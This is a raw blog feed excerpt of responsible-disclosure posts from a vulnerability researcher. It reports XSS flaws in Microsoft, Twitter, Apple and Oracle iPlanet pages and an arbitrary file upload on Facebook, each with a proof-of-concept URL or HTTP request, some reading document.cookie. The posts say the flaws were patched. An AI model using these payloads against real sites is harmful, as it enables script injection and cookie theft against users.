&lt;a href="https://www.facebook.com/whitehat" style="font-family: Verdana, sans-serif;" target="_blank"&gt;https://www.facebook.com/whitehat&lt;/a&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/vXNDUHgIZoQ" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/6135040875942474595/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/05/facebook-bug-2-arbitrary-file-upload.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/6135040875942474595?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/6135040875942474595?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/vXNDUHgIZoQ/facebook-bug-2-arbitrary-file-upload.html" title="Facebook Bug #2: Arbitrary File Upload Vulnerability Found in attachments.facebook.com" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-4Z3s8eH9Kzw/T6JMn0K13zI/AAAAAAAAAIc/qDOVS5UKulk/s72-c/FB2.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/05/facebook-bug-2-arbitrary-file-upload.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0UASXc-fCp7ImA9WhJREEs.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-3535773492469750655</id><published>2012-05-03T17:04:00.001+08:00</published><updated>2012-07-12T10:47:28.954+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-07-12T10:47:28.954+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="Microsoft" /><title>Microsoft Bug #1: Cross-Site Scripting (XSS) Found in connect.microsoft.com</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability&amp;nbsp;in&amp;nbsp;connect.microsoft.com, which can be exploited by an attacker to conduct XSS attacks.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Tested in&amp;nbsp;IE9 with XSS filter enabled&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;============================&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;http://connect.microsoft.com/sqlserver/searchresults.aspx?UserHandle=%2522%253E%2527%253E%253Cscript%2520%253Ealert%2528/XSS by Sow Ching Shiong/%2529%253B%253C%252Fscript%2520%253E&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;a href="http://3.bp.blogspot.com/-4r5aCfNrMjU/T6JJGS7m6rI/AAAAAAAAAIQ/D1KkyeiL8ao/s1600/PoC+(IE9+with+XSS+filter+enabled).png" imageanchor="1"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-4r5aCfNrMjU/T6JJGS7m6rI/AAAAAAAAAIQ/D1KkyeiL8ao/s400/PoC+(IE9+with+XSS+filter+enabled).png" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Conclusion&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;This vulnerability has been confirmed and patched by&amp;nbsp;Microsoft Security Team.&amp;nbsp;I would like to thank them for their quick response to my report.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Microsoft White Hat&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://technet.microsoft.com/en-us/security/cc308575" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://technet.microsoft.com/en-us/security/cc308575&lt;/a&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/-NsgnuJJ3c8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/3535773492469750655/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/05/microsoft-bug-1-cross-site-scripting.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/3535773492469750655?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/3535773492469750655?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/-NsgnuJJ3c8/microsoft-bug-1-cross-site-scripting.html" title="Microsoft Bug #1: Cross-Site Scripting (XSS) Found in connect.microsoft.com" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-4r5aCfNrMjU/T6JJGS7m6rI/AAAAAAAAAIQ/D1KkyeiL8ao/s72-c/PoC+(IE9+with+XSS+filter+enabled).png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/05/microsoft-bug-1-cross-site-scripting.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkINRHw4eSp7ImA9WhVVF0w.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-3715910637432788908</id><published>2012-05-03T16:50:00.002+08:00</published><updated>2012-05-11T14:43:15.231+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-11T14:43:15.231+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Facebook" /><category scheme="http://www.blogger.com/atom/ns#" term="Arbitrary File Upload" /><title>Facebook Bug #1: Arbitrary File Upload Vulnerability Found in attachments.facebook.com</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload&amp;nbsp;vulnerability&amp;nbsp;in&amp;nbsp;attachments.facebook.com,&amp;nbsp;which can be exploited by an attacker to compromise a victim's computer system.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;HTTP Request&lt;/span&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div style="font-family: 'Times New Roman';"&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;===========&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;POST /ajax/messaging/upload.php HTTP/1.1&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Host: attachments.facebook.com&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Accept-Language: en-us,en;q=0.5&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Accept-Encoding: gzip, deflate&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;DNT: 1&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Proxy-Connection: keep-alive&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Cookie: [information removed]&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Type: multipart/form-data; boundary=---------------------------4827543632391&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Length: 194188&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;-----------------------------4827543632391&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Disposition: form-data; name="post_form_id"&lt;/span&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;[information removed]
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;-----------------------------4827543632391&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Disposition: form-data; name="fb_dtsg"&lt;/span&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;[information removed]
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;-----------------------------4827543632391&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Disposition: form-data; name="id"&lt;/span&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;[information removed]
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;-----------------------------4827543632391&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Disposition: form-data; name="attachment"; filename="notepad.EXE"&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Content-Type: application/octet-stream&lt;/span&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://2.bp.blogspot.com/-lGwcITS0bK4/T6JGIKuKewI/AAAAAAAAAIE/Wq1QoILNRpM/s1600/FB1.png"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-lGwcITS0bK4/T6JGIKuKewI/AAAAAAAAAIE/Wq1QoILNRpM/s400/FB1.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Conclusion&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;This vulnerability has been confirmed and patched by&amp;nbsp;Facebook Security Team.&amp;nbsp;I would like to thank them for their quick response to my report.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Facebook White Hat&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a href="https://www.facebook.com/whitehat" style="font-family: Verdana, sans-serif;" target="_blank"&gt;https://www.facebook.com/whitehat&lt;/a&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/8SLMJ--V7_0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/3715910637432788908/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/05/facebook-bug-1-arbitrary-file-upload.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/3715910637432788908?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/3715910637432788908?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/8SLMJ--V7_0/facebook-bug-1-arbitrary-file-upload.html" title="Facebook Bug #1: Arbitrary File Upload Vulnerability Found in attachments.facebook.com" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-lGwcITS0bK4/T6JGIKuKewI/AAAAAAAAAIE/Wq1QoILNRpM/s72-c/FB1.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/05/facebook-bug-1-arbitrary-file-upload.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkEARng6fip7ImA9WhVVF0w.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-8517331346723079213</id><published>2012-04-29T17:38:00.001+08:00</published><updated>2012-05-11T14:44:07.616+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-11T14:44:07.616+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="Twitter" /><title>Twitter Bug #1: Cross-Site Scripting (XSS) Found in twitter.com</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability&amp;nbsp;in&amp;nbsp;twitter.com, which can be exploited by an attacker to conduct XSS attacks.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;https://twitter.com/intent/follow?original_referer=javascript:alert(document.cookie);&amp;amp;region=follow_link&amp;amp;screen_name=twitterapi&amp;amp;source=followbutton&amp;amp;variant=2.0&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://2.bp.blogspot.com/-MnPxlYrV7z0/T50L3jZb3pI/AAAAAAAAAGI/zU_4zPhdzk8/s1600/PoC+1+(twitter.com).png"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-MnPxlYrV7z0/T50L3jZb3pI/AAAAAAAAAGI/zU_4zPhdzk8/s400/PoC+1+(twitter.com).png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Conclusion&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;This vulnerability has been confirmed and patched by&amp;nbsp;Twitter&amp;nbsp;Security Team.&amp;nbsp;I would like to thank them for their quick response to my report.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Twitter White Hat&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a href="https://twitter.com/about/security" style="font-family: Verdana, sans-serif;" target="_blank"&gt;https://twitter.com/about/security&lt;/a&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/KFFlEQ3URXw" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/8517331346723079213/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/twitter-bug-1-cross-site-scripting-xss.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/8517331346723079213?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/8517331346723079213?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/KFFlEQ3URXw/twitter-bug-1-cross-site-scripting-xss.html" title="Twitter Bug #1: Cross-Site Scripting (XSS) Found in twitter.com" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-MnPxlYrV7z0/T50L3jZb3pI/AAAAAAAAAGI/zU_4zPhdzk8/s72-c/PoC+1+(twitter.com).png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/twitter-bug-1-cross-site-scripting-xss.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkECSXgzfip7ImA9WhVVF0w.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-989191892323077042</id><published>2012-04-29T17:27:00.002+08:00</published><updated>2012-05-11T14:44:28.686+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-11T14:44:28.686+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="Apple" /><title>Apple Bug #1: Cross-Site Scripting (XSS) Found in consultants.apple.com</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability&amp;nbsp;in consultants.apple.com, which can be exploited by an attacker to conduct XSS attacks.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;http://consultants.apple.com/au/locator_results.php?sl=AU&amp;amp;citystate=VIC&amp;amp;page=2&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://2.bp.blogspot.com/-oOV1sZHo7iQ/T50HzpwwUxI/AAAAAAAAAF8/bwT7g09pQKQ/s1600/PoC+(consultants.apple.com).png"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-oOV1sZHo7iQ/T50HzpwwUxI/AAAAAAAAAF8/bwT7g09pQKQ/s400/PoC+(consultants.apple.com).png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Conclusion&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;This vulnerability has been confirmed and patched by Apple Security Team.&amp;nbsp;I would like to thank them for their quick response to my report.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Apple White Hat&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://support.apple.com/kb/HT1318" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://support.apple.com/kb/HT1318&lt;/a&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/1Vd1-tkXg7Q" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/989191892323077042/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/xss-found-in-apple.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/989191892323077042?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/989191892323077042?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/1Vd1-tkXg7Q/xss-found-in-apple.html" title="Apple Bug #1: Cross-Site Scripting (XSS) Found in consultants.apple.com" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-oOV1sZHo7iQ/T50HzpwwUxI/AAAAAAAAAF8/bwT7g09pQKQ/s72-c/PoC+(consultants.apple.com).png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/xss-found-in-apple.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkAAR3w5fyp7ImA9WhVVF0w.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-767571419795462471</id><published>2012-04-29T12:01:00.002+08:00</published><updated>2012-05-11T14:45:46.227+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-11T14:45:46.227+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="Oracle" /><title>Oracle iPlanet Web Server 7.0.9 Multiple Cross-Site Scripting (XSS) Vulnerabilities</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Oracle iPlanet Web Server is a web server designed for medium and large business applications. Oracle iPlanet Web Server builds on the earlier Sun ONE Web Server, iPlanet Web Server, and Netscape Enterprise Server products.&lt;br /&gt;&lt;br /&gt;Sow Ching Shiong, an independent vulnerability researcher has discovered multiple Cross-Site Scripting vulnerabilities in&amp;nbsp;Oracle iPlanet Web Server. These issues were discovered in a default installation of&amp;nbsp;Oracle iPlanet Web Server 7.0.9. Other earlier versions may also be affected.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Reflected XSS&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;===========&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc='"--&amp;gt;&amp;lt;/style&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(/XSS/)&amp;lt;/script&amp;gt;&amp;amp;versionFile=../version/copyright?__token__=&amp;amp;productNameHeight=42&amp;amp;productNameWidth=221&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc=../images/VersionProductName.png&amp;amp;versionFile=../version/copyright?__token__=&amp;amp;productNameHeight='"--&amp;gt;&amp;lt;/style&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(/XSS/)&amp;lt;/script&amp;gt;&amp;amp;productNameWidth=221&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc=../images/VersionProductName.png&amp;amp;versionFile=../version/copyright?__token__=&amp;amp;productNameHeight=42&amp;amp;productNameWidth='"--&amp;gt;&amp;lt;/style&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(/XSS/)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Stored XSS&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;=========&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&amp;amp;firstLoad=true&amp;amp;appName='"--&amp;gt;&amp;lt;/style&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(/Stored XSS 1/)&amp;lt;/script&amp;gt;&amp;amp;helpFile=&amp;amp;pathPrefix=&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&amp;amp;firstLoad=true&amp;amp;appName=admingui&amp;amp;helpFile=&amp;amp;pathPrefix='"--&amp;gt;&amp;lt;/style&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(/Stored XSS 2/)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;To trigger Stored XSS:&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;=================&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&amp;amp;firstLoad=true&amp;amp;appName=TESTING&amp;amp;helpFile=&amp;amp;pathPrefix=&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;Oracle has released patches which address these issues. Please see the references for more information.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;References&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Vendor URL:&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html#AppendixSUNS" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html#AppendixSUNS&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Secunia:&amp;nbsp;&lt;/span&gt;&lt;a href="http://secunia.com/advisories/43942/" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://secunia.com/advisories/43942/&lt;/a&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Disclosure Timeline&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;2011-03-29 - Vulnerabilities discovered.&lt;br /&gt;2011-03-29 - Vulnerabilities reported to Secunia.&lt;br /&gt;2011-04-07 - Secunia confirmed the vulnerabilities and contacted the vendor.&lt;br /&gt;2012-04-17 -&amp;nbsp;Patch released.&lt;br /&gt;2012-04-18 - Advisory published by Secunia.&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/6VADuQr_1eM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/767571419795462471/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/oracle-iplanet-web-server-709-multiple.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/767571419795462471?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/767571419795462471?v=2" /><link rel="alternate" type="text/html" 